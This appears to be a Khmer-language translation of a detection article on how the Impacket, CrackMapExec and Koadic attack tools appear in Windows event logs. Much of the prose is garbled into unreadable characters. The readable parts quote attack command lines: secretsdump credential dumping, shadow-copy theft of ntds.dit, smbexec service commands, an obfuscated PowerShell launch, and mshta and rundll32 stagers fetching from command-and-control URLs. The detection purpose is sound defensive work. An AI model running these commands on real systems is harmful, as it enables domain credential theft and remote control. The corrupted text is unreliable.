α
ααα½αααααΆαααΆααααα αΆααα
αααα»ααα·αααααΆααΈααααααααα»αααΎαα‘αΎαααΆαααααΆααααααΆαα α§ααΆα ααα
ααΆαα½αα±ααααααααααΆααααΆα§αααααααΆααααααα·αααααΌαααΆαααααΎαααααΆααααΆααααααα
αΌαααααΌααααααααα»ααααααΎααααΈα’αα·ααααααΆαααΆααααα αΆααα
αααα»αα αααααΆαα
ααΆααααααααα α’αααααΆααααα αΆαααααΎααΆαα
ααααΆααααΆααααααααααΆααααΆαααΆααααα αΆααααααΆααααΈααΆααααααα
αΌαααααα·αααα αααααααα·ααΈααα ααΊαα·ααΆααααα»αααΆαααααΎα α αΎαααΆααΏααααΆααααααα½αααΈαα
αα
αααα·ααααΆααα»αααααα
α’αααΈαααααΎαααααΌαααααΎα
- ααααααααααΈαααααααα§ααααααα½α α αΌαααααΎαααΆα. ααααααααααΆααΎα’αααααΆααααα αΆαααααΌαααΆαα’αααΈααααααΎααααΈααααααααααα αα·ααα αα αααα·ααααΆα’αααΈααααα½αααα’αΆα ααααΎααααΆααααΆαα
- αααααααα’αααΈααααα·αααααΌαααΆαααααΎααααα§ααααααα»ααααα·ααΆαααααααΆααα αααα»αααααΆααααΆαααααΌαααααΆαααΆααααα αΆα. ααααΆααααΆαααααααααΆαααα’αΆα ααααΌαααΆααααα ααΆαααααααΆαα’αααααΆααααα αΆαααΊααΆα’αααααΆααααα αΆαααΆααααα»α α¬αααααΆαααα’αααααΆααααα αΆααααα»αααααααααααα αααααα αααα»αα αααααΆαα ααΆααααααααααααα·αααααΆααααΈαα»αα ααΆααααΆαααΆα’αΆα ααααΎαα ααΆαααΎααααΈααααΆααααααααααΆααααΆααααΌααααααααααΆαααααααΆααααΌα ααααααααααααΆααααΆααΎααααΈααααΎαα αααΆαααααααααα
- αα»αααααΆααααΆααα·αααααΆααα·ααα·αα ααααΈα§αααααααααΎαααΆαααααΆαααΆα. ααΎααα·αααααΌαααααα ααΆαα αααααααααααααΆαααΆααααΆααααααΌαααΆαααααΎααα ααΎααΌαααααΆαααααΆαααααααααΆαααααααααΆααα―α ααα α»αααΆααΉαααΆααα’αΆα ααααΎαα ααΆαα ααΆααααααΆαα αααα»αα αααααΆαα ααΆααααααααααΆααααααααΆααααααααααΆαα ααααα·αα’αΆα αααα ααααΆαααΈαα·ααΈααααα αααΆαααα glance ααααΌα ααΎααααΈααα½αααΆαααααααΆαααΆαα½αα
ααΎα§αααααααΆααααααααααα±ααα’αααααΆααααα αΆαα’αααΈαααα? ααααα·αααΎαααααΆ Impacket αααα’αααααΆααααα αΆαααα½αααΆααααααΆααααααααα½ααααααΌαα»ααααα’αΆα ααααΎααΆααα ααααΆααααΆααααααααααΆααααΆαααΆααααα αΆααααααΎαα‘αΎααααααΆααααΈαααααααα·ααααααα α§αααααααΆα αααΎαααααΎαααΌαα»α Impacket ααΆααααα»α - α§ααΆα ααα Metasploit α ααΆααΆα dcomexec αα·α wmiexec αααααΆααααααα·ααααα·ααΆααααααααΆααΈα ααααΆα secretsdump αααααΆααααΆαααα½αααΆαααααΈααΈα’αααα αα αΆααααααααΌαααΆαααααααααΈ Impacket α ααΆαααααα ααΆαααααΎαααααΉαααααΌααααααααααΆααααααααΆαααααααααααΉαααΆααΆααΆαααΌαααΆαααααΎααααα·ααααααααααα»α
ααΆαα·ααααααΆααΏαα ααααααααααα’ααααααααΎαααΆααααααααΆ "ααΆααααααα Impacket" α’αααΈ CrackMapExec (α¬ααΆαααα CME) α ααΎαααΈαααααα CME ααΆααα»αααΆααααααααααα½α ααΆααααα αααααΆααααααΆααΈαααΌααααααα·ααα Mimikatz αααααΆααααΆαααα½αααΆαααΆααααααααΆαα α¬αααααΆαααααΆαααααα½ααα ααΆαα’αα»αααα Meterpreter α¬ααααΆααααΆα Empire αααααΆααααΆαααααα·ααααα·ααΈα ααααΆα αα·α Bloodhound αα ααΎααααα ααα
α§αααααααΈααΈαααααΎαααααΎαααΎαααΊ Koadic α ααααΈαααα ααΆααααΌαααΆααααα αΆααα αααα»αααααα·αα·α Hacker α’ααααααΆαα· DEFCON 25 αααα»αααααΆα 2017 α αΎαααααΌαααΆααααααΆααααααα·ααΈααΆααααααα·ααααααααΆαα ααΆααααΎαααΆαααΆαααα HTTP, Java Script αα·α Microsoft Visual Basic Script (VBS) α αα·ααΈααΆααααααααααααΌαααΆαααα α ααΆααΆαααααα αααα ααΈα α§αααααααααΎααααΆαααααα»αααααΆαα’αΆααααα αα·ααααααΆααααααααΆααααααΎαα‘αΎααα αααα»αααΈαααΌα α’ααααααααΎαα α ααΆααΆ COM Command & Control α¬ C3 α
IMPACKET
αα»αααΆααααα Impacket ααΊααααΌααΆαααΆαα α αΆααααΈααΆαααααααααΆααααα ααΆααααα»α AD αα·αααΆααααααΌααα·ααααααααΈαααΆαααΈααα MS SQL ααΆααααα»α αα αΌαααααα αα αααααααΎααααΈααα½αααΆαααααααΆααααααΆααα’ααααααααΆαα αααααΊααΆααΆαααΆααααα αΆααααααΌαα SMB αα·αααΆαααα½αααΆαα―αααΆα ntds.dit αααααΆαααααααααΆααα’αααααααΎααααΆααααΈα§ααααααααααΆαααα Impacket ααααααα·ααααα·ααΆααααααααΆααΈα ααααΆααααααααΎαα·ααΈαα½ααααααααααΆαααα WMI, Windows Scheduler Management Service, DCOM, αα·α SMB α αΎαααΆαααΆαααααααΆααααααΆααα’ααααααααΆαααΎααααΈααααΎααΌα ααααααΆαα
α’αΆααααααΆαα
αααααΎαααΏααααααΆααα αααααΊααΆαααΌαα»ααααα’αΆα αααααααααα ααΆαααααΆαααΈαα’αααααααΎααααΆαα αα·αα§ααααααααααΆαααα ααΆα’αΆα ααααΌαααΆαααααΎααΎααααΈααα½αααΆαα αααΆααα αααααααααααα’αααα αα αΆα LSA, SAM, SECURITY, NTDS.dit ααΌα ααααααΆα’αΆα ααααΌαααΆαααααΎαααΎααα ααααΆααααΆααααααααααΆααααΆαααΆααααα αΆαα ααα αΆαααααΌααααα»αααααα·ααααα·ααΆααααααααΌαα»αααΊααΆααααααααααΆααααΆαααα SMB αααααΆαααΆαααΆααααΆααααααααΆααααααα’αααααααΎ α¬αααααΆααααααΆααΎααααΈα’αα»ααααααΆαααΆααααα αΆα Pass the Hash αααααααααααααααα·α αααααΆααααααΆαααααΎααΎααααΈααΎαααΆαα αΌαααααΎαααααα·ααΈαααααααααααααΆαααα (SCM) αα·αααα½αααΆααα·αααα·α αΌαααααΎαααΆααααααΈαααααααΆαααααα·ααΈααΆα winreg αααααααΎαααα’αααααΆααααα αΆαα’αΆα ααααααααα·ααααααααααΆααΆαααα αΆααα’αΆαααααα αα·αααα½αααΆαααααααααΆαααα SMB α
αα αααα»αααΌαααα 1 ααΎαααΎαααΆααΎαα αααααααΎαα·ααΈααΆα winreg ααΆαα αΌαααααΎααααΌαααΆαααα½ααααααααΎααα α»ααααααΈααΆαα½α LSA αααΆαααΌα ααααα α ααΎααααΈααααΎααΌα αααααΌαααααΎααΆααααααααΆ DCERPC ααΆαα½α opcode 15 - OpenKey α
α’ααααα 1. ααΆαααΎαααα
α»ααααααΈαααααααΎαα·ααΈααΆα winreg
αααααΆαααα αα ααααααααΆαα αΌαααααΎααααααΌαααΆαααα½α αααααααααΌαααΆααααααΆαα»ααααααααΎααΆααααααααΆ SaveKey ααΆαα½α opcode 20. Impacket ααααΎααΌα αααααΆααα·ααΈααΆααααΆαααα½αα ααΆβαααααΆαα»αβαααααβαα βα―αααΆαβαααβααΆαβαααααβααΆβα’ααααβα αααααβα ααα½α 8 ααααααβααα .tmp α ααΎαααΈααα ααΆααααα ααα―αααΆαααααααααααααααΎαα‘αΎαααΆαααα SMB ααΈαα System32 (ααΌαααΆαααΈ 2)α
α’ααααα 2. αααααααΆααααααααΆααααΆαααα½αααΆαααΌαααα
α»ααααααΈααΈαααΆαααΈαααΈα
ααααΆα
ααΆαααα αΆαααΆαααααααΆααααααααα ααΎαααααΆαα’αΆα ααααΌαααΆαααααΎαααααααα½ααα ααΆααααΆααΆαααααΈααααααα½αα ααα½ααααααααΎαα·ααΈααΆα winreg αααααααΆααααΆαα ααΆααααααααΆ αα·αααααΆααααααααΆα
αααΌαα»αααααααα»αααΆααα αααα»ααααααα ααα»ααααΉαααα·ααΆααα Windows αααααααΎα±ααααΆααΆααααα½ααααα»αααΆαααααΎαα α§ααΆα αααααΆααααααααααΆαααααα·ααααα·ααΆααααααααΆ
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
αα αααα»ααααααα ααα» Windows Server 2016 ααΎαααΉαααΎαααααΆααααααΆαααααααααΉαααα·ααΆαααααΌα ααΆααααααα
1. 4624 - α
αΌαααΈα
ααααΆαα
2. 5145 - αα·αα·αααααΎααα·αααα·α
αΌαααααΎααααΆααααααΈα
ααααΆα winreg α
3. 5145 - αα·αα·αααααΎααα·αααα·α
αΌαααααΎα―αααΆααα
αααα»ααα System32 α α―αααΆαααΆααααααα
ααααααααααΆααααααΆααααΆαααΎα
4. 4688 - αααααΎαααααΎαααΆα cmd.exe αααααΎαααααΎαααΆα vssadminα
βC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - αααααΎαααααΎαααΆαααΆαα½αααΆααααααααΆα
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - αααααΎαααααΎαααΆαααΆαα½αααΆααααααααΆα
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - αααααΎαααααΎαααΆαααΆαα½αααΆααααααααΆα
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
Smbexec
ααΌα ααΆα§ααααααααααααΆαααααααααααα ααΆα αααΎα Impacket ααΆααααΌαα»ααααααΆααααααα·ααααα·ααΆααααααααΆααΈα ααααΆαα ααΎαααΉααααααααΎ smbexec ααααααααααΌααααααΆααααααααΆα’αααααααααα ααΎαααΆαααΈαααΈα ααααΆαα αααΌαα»ααααααααΆαααΆαααΆααααααααααΆααααΆαααα SMB ααααα ααΆαααααααααΎααααααααΆαα α¬αααααΌααααααΆααα αα αααα»αααΌαααα αα αααα»αααΌαααΆαααΈ 3 ααΎαααΎαα§ααΆα αααα’αααΈαααααααα§αααααααααααααααΎαααΆα αααα»αααααΈαααααΆααΊααΆαα»αααΌαα’ααααααααααααααΌαααααΆαα
α’ααααα 3. αα»αααΌα smbexec α’αααααααα
ααα αΆαααααΌααα smbexec αααααΆααααΈααΆααααααααααΆααααΊααααΌαααΎα ββSCM αααααααΎααΆααααααααΆ OpenSCManagerW (15) α αααα½αααΊαα½αα±ααααααααααΆαα: ααΆαααααααααΆαααΈαααΊα’ααα αααααα
α’ααααα 4. ααααΎαα»αααΎααααααα·ααΈαααααααααααααΆαααα
αααααΆααααααααΆααααααααΌαααΆααααααΎααααααααΎααΆααααααααΆ CreateServiceW (12) α αααα»αααααΈ smbexec ααΎαα’αΆα ααΎαααΎααααααα·ααααΆαααααααΆααααααααΆααΌα ααααΆααΆαααααα αα αααα»αααΌαααα 5 ααααααααααα αΆαααΈαααΆαααΆααααααααΆααααααααΆααααα·αα’αΆα ααααΆααααααΌαααΆα αααααΏααααα αΆαααΈα’αααΈαααα’αααααΆααααα αΆαα’αΆα ααααΆααααααΌαα ααΆααΆααααα½αααΎαααΎαααΆαααααα―αααΆααααα’αΆα ααααα·ααααα·ααΆα ααα―αααΆαααααααΆ αα·αα―αααΆαααααααα’αΆα ααααΌαααΆαααααΆααααααΌα ααα»αααααα αααααΊαα·ααΆαααΆααααα»αααΆαααααΆααααααΌαααααα·αααααΆαααααααααα·ααααΆαααααΌαα»α Impacket α
α’ααααα 5. ααααΎαα»ααααααΎαααααΆαααααααααααΎαααααα·ααΈαααααααααααααΆαααα
Smbexec αααα»αααΆαααΆααααααααα αααα»ααααααα ααα»ααααΉαααα·ααΆαααααΈαααΌαααααα αα αααα»ααααααα ααα» Windows Server 2016 αααααΆαααααααΆααααααααΆα’ααααααααααΆαα½αααΆααααααααΆ ipconfig ααΎαααΉαααΎαααααΆααααααΆαααααααααΉαααα·ααΆαααααΌα ααΆααααααα
1. 4697 β ααΆαααα‘αΎαααααΆαα ααΎαααΆαααΈααααααααααα
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - ααΆααααααΎαααααΎαααΆα cmd.exe ααΆαα½αααΉαα’αΆαα»αααααααΈα
ααα»α
1 α
3. 5145 - αα·αα·αααααΎααα·αααα·α
αΌαααααΎαααΆααα
ααΆααα―αααΆα __output αα
αααα»ααα C$ α
4. 4697 - ααΆαααα‘αΎαααααΆαα
ααΎαααΆαααΈααααααααααααααα
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ααΆααααααΎαααααΎαααΆα cmd.exe ααΆαα½αααΉαα’αΆαα»αααααααΈα
ααα»α
4 α
6. 5145 - αα·αα·αααααΎααα·αααα·α
αΌαααααΎαααΆααα
ααΆααα―αααΆα __output αα
αααα»ααα C$ α
Impacket ααΊααΆααΌαααααΆααααααΆααααΆαα’αα·ααααααα§αααααααΆααααα αΆαα ααΆααΆαααααα·ααΈααΆαααααΎαααααΆααα’αααα αααα»αα αααααΆαα ααΆααααααααααΈαααΌ α αΎααααα»αααααααα½αααΆααααααααα·αααααααΆαααααα½αααααααΆα αααααΊααΆααααΎααΆααααΆαααααα winreg αα·αααΆαααααΎααααΆαα SCM API ααΆαα½αααΉαααΆααααααΎαααΆααααααααΆαααααα αα·ααααααααααααα―αααΆα αα·α SMB share SYSTEM32α
CRACKMAPEXEC
α§ααααα CME ααααΌαααΆααα ααΆα‘αΎαααΆα ααααααΎααααΈααααΎααααααααααααα·αααααααααααΆααααααΆααααΆααααααααα’αααααΆααααα αΆαααααΌαααααΎααΎααααΈααΆααα αα»ααααα»ααααααΆαα ααΆα’αα»ααααΆαα±ααα’αααααααΎααΆααααααααΆααααΆαα½αααααΆααααΆα Empire αα·α Meterpreter ααααααΈααααΆαα ααΎααααΈααααα·ααααα·ααΆααααααααΆααααααααΆαα CME α’αΆα ααααααααα½αααΆααΆαα αααααααΎ Bloodhound (α§αααααααααααααΆαααααΆα ααααα‘αα) α’αααααΆααααα αΆαα’αΆα ααααΎααΆαααααααααααααααααααααααα·αααααΆαααααααααααααααααααααααα
ααΆααααα αΌαααΆα
Bloodhound ααΆα§αααααα―αααΆααα α’αα»ααααΆαα±ααααΆαααΆαααααααααΆαααααααα·αααααααα αααα»ααααααΆαα ααΆαααααΌααα·ααααααα’αααΈα’αααααααΎααααΆαα αααΆαααΈα αααα»α αααα αα·αααααΌαααΆαααααααααααααΆααααααΈα PowerShell α¬α―αααΆααααααΈαα αα·ααΈααΆααααααΆαααΌαααααΆαααΎ LDAP α¬ SMB ααααΌαααΆαααααΎααΎααααΈαααααΌαααααααΆαα αααΌαα»ααα½ααααα αΌα CME α’αα»ααααΆαα±αα Bloodhound ααααΌαααΆαααΆααααα ααΆαααααΆαααΈαααααααααααααα ααααΎαααΆα αα·αααα½ααα·αααααααααααΆααααααΌααααααΆααααΈααΆαααααα·ααααα· αααα ααα»ααααααααααΆααααααααααααααααα·αα αααα»ααααααααα αα·αααααΎα±αααα½αααΆαα·αααΌαααααααααΆααα αααααααΆα ααα·α Bloodhound αααα αΆααα·ααααααααααααααΌαααΆααααα»αααααααααΆααααΆα αα αααα’αα»ααααΆαα±ααα’ααααααααααααααΌαααααΈαααα»αααΈαααΆαααΈαααααα’αααααΆααααα αΆααα ααΆααα’αααααααααααααααα
α’ααααα 6. α
ααα»α
αααααΆαα Bloodhound
ααΎααααΈααααΎαααΆαααΎαααΆαααΈαααααααααααααα αααΌαα»ααααααΎαααΆααα·α αα αααααααΎ ATSVC αα·α SMB α ATSVC ααΊααΆα ααα»α αααααΆαααααααΆααααααΎααΆαααΆαα½α Windows Task Scheduler α CME ααααΎαα»αααΆα NetrJobAdd(1) αααααααα½αααΎααααΈαααααΎααα·α αα ααΆααα ααΎαααααΆαα α§ααΆα αααααα’αααΈααααααΌαα»α CME ααααΎααααΌαααΆααααα αΆααα αααα»αααΌαααα 7: αααααΊααΆααΆαα α ααΆααααααααΆ cmd.exe αα·αααΌααααα ααα‘ααα αααα»αααααααααα’αΆαα»ααααααααα»ααααααα XML α
ααΌα α§. αααααΎααα·α
αα
ααΆαααΆαααα CME
αααααΆααααΈαα·α αα ααΆαααααΌαααΆαααΆααααααΎαααααΆααααΆααααα αΆαααΈαα·α αααΆαααΈααααααααααααααα αΆααααααΎα Bloodhound ααααααα½αα―α α αΎααααα’αΆα ααααΌαααΆαααααΎαααΎααα αααα»αα ααΆα αααα αααΌαα»αααααΌαααΆααααααααααααααααααα½α LDAP ααΎααααΈααα½αααΆααααα»ααααααααΆα αααααΈαααΆαααΈα αα·αα’αααααααΎααααΆααααΆααα’αααα αααα»αααα αα·αααα½αααΆαααααααΆαα’αααΈααααα’αααααααΎααααΆαααααααααΆααααααααΎ SRVSVC NetSessEnum α
α’ααααα 8. ααΆαααα½αααΆααααααΈαααααααααααααΆαααα SMB
ααΎαααΈαααααα ααΆαααΎαααααΎαααΆα Bloodhound αα
ααΎαααΆαααΈααααααααααααΆαα½αααΉαααΆαααΎααααααααααααΌαααΆαα’ααααααααΉαααα·ααΆααααααααΆαααααααααΆαα 4688 (ααΆααααααΎαααααΎαααΆα) αα·ααααααααααΎαααΆαα Β«C:WindowsSystem32cmd.exeΒ»
. α’αααΈααααα½αα±ααααααααααΆααα’αααΈααΆααΊα’αΆαα»ααααααααααΆααααΆααααααααΆ:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , β¦ , 40,41 )-jOIN'' ) "
Enum_avproducts
αααΌαα»α enum_avproducts ααΊαα½αα±ααα αΆααα’αΆααααααααααΆααααΆααααΈα ααα»α αααα·αααααΆααααα»αααΆααα·αααΆαα’αα»ααααα WMI α’αα»ααααΆαα±ααα’αααααααΎααΆααΆαααα½α WQL ααΎααααΈααΆααααα·ααααααααΈααααα» Windows αααααα αααααΆα’αααΈαααααααΆααααααααΌαα»α CME αααααααΎα ααΆαααααΎααααα½ααα ααΆααααααΆαα AntiSpywareProduct αα·α AntiΠirusProduct α’αααΈα§αααααααΆαααΆααααααΆαααα‘αΎααα ααΎαααΆαααΈααααααααααααααα ααΎααααΈααα½αααΆααα·ααααααα αΆαααΆα α αααΌαα»αααααΆαααα ααααααααααα rootSecurityCenter2 αααααΆαααααααααΎααααα½α WQL αα·αααα½αααΆαααΆαααααΎαααα αα αααα»αααΌαααα ααΌαααΆαααΈ 9 αααα αΆαααΈααααΉαααΆαααααααΎ αα·αααΆαααααΎαααααααααα αα αααα»αα§ααΆα αααααααααΎα Windows Defender ααααΌαααΆαααααΎαα
α’ααααα 9. αααααααΆααααααΆααααααΌαα»α enum_avproducts
ααΆααΉαααΆαα ααΆαααααΎααααααα WMI (Trace WMI-Activity) ααααα αααα»αααααΉαααα·ααΆααααααα’ααααααααααααααααΆαααΆαααααααααα’αααΈαααα½α WQL α’αΆα ααααΌαααΆααα·αα ααα»ααααααααα·αααΎααΆααααΌαααΆαααΎα αααααααα·αααΎααααααΈα enum_avproducts ααααΌαααΆαααααΎαααΆα ααααΉαααα·ααΆααααααααΆαααααααααΆαα 11 ααΉαααααΌαααΆααααααΆαα»αα ααΆααΉαααΆααααααα’αααααααΎααααΆαααααααΆαααααΎααααΎ αα·αααααααα αααα»α namespace rootSecurityCenter2α
αααΌαα»α CME ααΈαα½ααααΆαααααα»αα»ααΆααααααααα½α ααΆααΎααΆααΆαααα½α WQL ααΆααααΆαα α¬ααΆααααααΎαααααααααΆαααΆαααΆααααΆαααα½ααα αααα»ααααααα·ααΈααααααααααΆααα·α αα αααααΆαααΆαα ααααΌαα ααααα αα·ααααααααΆαααΆααααΆαα Bloodhound αα αααα»α LDAP αα·α SMB α
KOADIC
αααααααα·αααααααααααα Koadic ααΊααΆαααααΎααααΆαααααααα·ααΈαααααα JavaScript αα·α VBScript αααααΆααααααΎαα‘αΎααα αααα»α Windows α αααα»ααααααα ααΆααααΎααΆααααααααααΆαααααα αααα ααΈ - αααααΊααΆαα·αααΆαααΆαααΉαααα’ααααΈααΆααααα αα·αααααΎα§αααααααΈαααΌαααααααΆαα αααααΊααΆα§ααααααααααΆαα Command & Control αααααα (CnC) α αΆααααΆααααΈαααααΆααααΈααααααααα "implant" ααααΌαααΆαααα‘αΎααα ααΎαααΆαααΈα αααα’αα»ααααΆαα±ααααΆαααααααααα αααΆαααΈααααααααα αααα»αααΆαααααααα Koadic ααααΌαααΆαααα α ααΆ "ααααα αα " α ααααα·αααΎααΆααα·αααα·αα·ααααααααααΆαααααααΆααααααα·ααααα·ααΆααααααααα ααΆαααΆααΈααααααααα Koadic ααΆαααααααΆαααΎααα½ααααααααααΎαα αα αααααααααααΆααααΆααααααααααααααΈα’αααααααΎααααΆαα (UAC bypass) α
α’ααααα 10. Koadic Shell
αααααααααααααΌαααα αΆααααααΎαααααΆααααααααΆαα½ααααΆαααΈααα Command & Control α ααΎααααΈααααΎααΌα αααααΆαααααΌαααΆαααα URI αααααΆααααα αααΈαα»αα αΎαααα½αααΆααα½ Koadic ααααΆαααααααααΎα§αααααααααααα½αα αα αααα»αααΌαααα ααΌαααΆαααΈ 11 αααα αΆαα§ααΆα ααααααααΆαα mshta stager α
α’ααααα 11. ααΆαα
αΆααααααΎαααααααΆαα½ααααΆαααΈααα CnC
αααααα’ααααΎα’αααααααΎααα WS ααΆα αααΆααααΆααΆαααααα·ααααα·ααΎαα‘αΎαααΆαααα WScript.Shell α αΎαα’ααα STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ααΆαααααααΆαααααΆαααα’αααΈαααΆαααΆαααααααααααααα αα α»ααααααα αααααΊααΆααΌααααΎαααααααΎααααΌααα αααα»αααΆααααααΆαα HTTP ααΆαα½ααααΆαααΈααα CnC α ααααΎααΆαααααααααΆααααΊααΆαααααααααααΆαααα ααΉααα»αααΆααααααΌαα»ααααααα α ααΆ (ααΆαααααΆα)α αααΌαα»α Koadic ααΆααα’ααααααΎαααΆαααααΆαα½ααααααααααααΆαα½α CnC ααα»αααααα
Mimikatz
ααΌα CME ααααΎααΆαααΆαα½α Bloodhound ααα Koadic ααααΎααΆαααΆαα½α Mimikatz ααΆαααααα·ααΈααΆα ααααα‘αα αα·αααΆααα·ααΈααΆα αααΎαααΎααααΈααΎαααααΎαααΆαααΆα ααΆααααααβαααβααΊβααΆβααΌβααααΎαααβααααΎβαααααΆααβααΆαβααΆαβαα Mimikatz implant α
α’ααααα 12. ααααα Mimikatz αα
Koadic
α’αααα’αΆα ααΎαααΈααααααααααααα URI αααα»αααααΎααΆαααααΆααααααΌαα α₯α‘αΌααααααΆααΆαααααααααααΆααα’ααα csrf αααααα½ααα»αααααΌαα αααααααΌαα»ααααααΆαααααΎαααΎαα αα»αααα α·ααααα»αααΆααα αααααααααααααααΆα; ααΎαααΆααα’ααααααΆααΉαααΆ CSRF ααΆααααααΆααααΌαααΆαααααα»αααααΆα ααΆαααααΎαααααΊααΆαα½ααααΆααααΌα ααααΆαααα Koadic αααααΌααααααΆααααααΉα Mimikatz ααααΌαααΆαααααααα ααΆααΆαααα αααααΆαα ααΌα ααααααΌααααα‘ααααΎαα ααα»α ααααΆαααα αα ααΈαααααΎαααΆααααααΆααα Mimikatz αααααααΌαααΆαα’αα·αααΌααααα»α base64 αααααΆααααΆαα .NET αααααΈαααααΉαα αΆααααΆ αα·αα’αΆαα»αααααααΎααααΈααΎαααααΎαααΆα Mimikatz α ααααααααααα·ααααα·ααααΌαααΆααααααΌαααΆααααααΆααααα»αα’αααααα αααΆααααΆααα
α’ααααα 13. ααααααααααΆαααααΎαααΆα Mimikatz αα
ααΎαααΆαααΈαααΈα
ααααΆα
Exec_cmd
Koadic ααααΆααααΌαα»ααααα’αΆα ααααα·ααααα·ααΆααααααααΆααΈα ααααΆααααααα αα ααΈαααααΎαααΉαααΎααα·ααΈααΆααααααααααΎα URI ααΌα ααααΆ αα·αα’ααα sid αα·α csrf αααααααΆααααααΆααα αααα»αααααΈαααααΌαα»α exec_cmd ααΌαααααΌαααΆααααααααα αα½αααααΆααααααααΆαααααα·ααααα·ααΆααααααααΆαααα ααΆααααααααααΌαααΆααααα αΆαααΌααααααααααααΆααα αααα»αααΆαααααΎααα HTTP αααααααΆαααΈααα CnC α
α’ααααα 14. αααααΌα Implant exec_cmd
α’ααα GAWTUUGCFI αααααΆααα»ααααααα WS αααααααΆααααααΆααααΊααααΌαααΆαααΆαααΆααααααΆααααΆαααααα·ααααα·ααΌαα αααααΆααααα½αααααααΆ implant α α ααα ααααΎαααΆαααΌαααΈαααΆααΆ - shell.exec ααΆαα½αααΉαααΆααααα‘αααααα·αααααααααΈααα·αααααααααααα αα·α shell.run ααααα·ααααα‘αααααα·αα
Koadic αα·ααααααΆα§αααααααααααΆαα ααα»ααααααΆααΆαααααα»αα»ααΆαααααααΆ αααααΆα’αΆα ααααΌαααΆαααααΎααα αααα»αα ααΆα αααααααα αααΆααα
- ααΆααααααΎααα·αααααααααΎ HTTP,
- αααααααΎ winHttpRequests API,
- ααΆααααααΎαααααα» WScript.Shell ααΆαααα ActiveXObject,
- ααΆαααΆααααααα’αΆα ααααα·ααααα·ααΆαα
ααΆααααααΆααααααΌαααααΌαααΆααααα½α ααααΎαααα stager ααΌα ααααααΆα’αΆα ααααΎααααααααΆαααααααΆααΆααααααααΉαααα·ααΆααα Windowsα αααααΆαα mshta αααααΊααΆααααΉαααα·ααΆααα 4688 ααααααα αΆαααΈααΆααααααΎαααααΎαααΆααααααΆααα»αααααααα αΆααααααΎαα
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
ααααααααα Koadic αααα»αααααΎαααΆα α’αααα’αΆα ααΎαααΎαααααΉαααα·ααΆααα 4688 ααααααααααΆαα½αααΉααα»αααααααααααααααααααααααααααΆαααΆαααα’α₯αααα ααα
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
ααΆαααααΎα
αα·ααααΆααΆαααααα
αααα
ααΈαααα»αααα½αααΆααααααΆαααα·αααΆααααα»αα
ααααα§αααα·αααααα αα½αααααααΎααααΆααα§ααααα αα·αααααααΆααααααΆααααααΎααα
αααα»α Windows αααααΆαααααααΌαααΆααααααα½αααα ααΎααααα»αααΎαα§αααααααααα·αα Koadic, CrackMapExec αα·α Impacket ααΆααααααΆααααααααΆααααααααΆααα‘αΎααα
αααα»ααααΆαααΆααα APT α α
ααα½ααααα
ααΎ GitHub αααααΆααα§αααααααΆααααααααααα»αααΎαα‘αΎαααααα α αΎαα§αααααααααΈαααα»αααα
α‘αΎα (ααΆααααα αααα½αααΆαααα½α
αα
α αΎα) α αα·ααααΆααΆαααααααα»αααα½αααΆααααααΆαααα·αααΆααααααΆαααααΆαααΆααααααααααΆα α’αααααΆααααα αΆααα·αααααΌαααΆαα§αααααααΆααΈααΈααΈαα αα½αααααΆααα
ααΎαααΆαααΈαααααααααααααααα½α
α αΎα αα·ααα½ααα½αααα±ααααααα»αααΈαα·ααΆαααΆααα»ααααα·ααΆαα ααΎααααααααΎααΆααα·ααααΆααααΆαααααααααααΆαα α§αααααααΈαα½αααααααΆααα·αααααΆααΆαααΎαα»αααΆαααααΆαααααα½αααααααΆαα
αααα»αα
ααΆα
ααααααααΆαα ααΆααα·ααααΆαααα’α·αα’αααΈαα½αααΆααΆαα’αα»ααααΆαα±ααααΎαααααααααα·αααααααααΎαα
α’ααααα·αααα:
- ααα Anton Tyurin αααααΆαααΆααααααΆαααααΆααααα’αααααααΆα αααααααααααααα·αα»α PT Expert αα αα αααα·ααααΆαα·αααααΆα
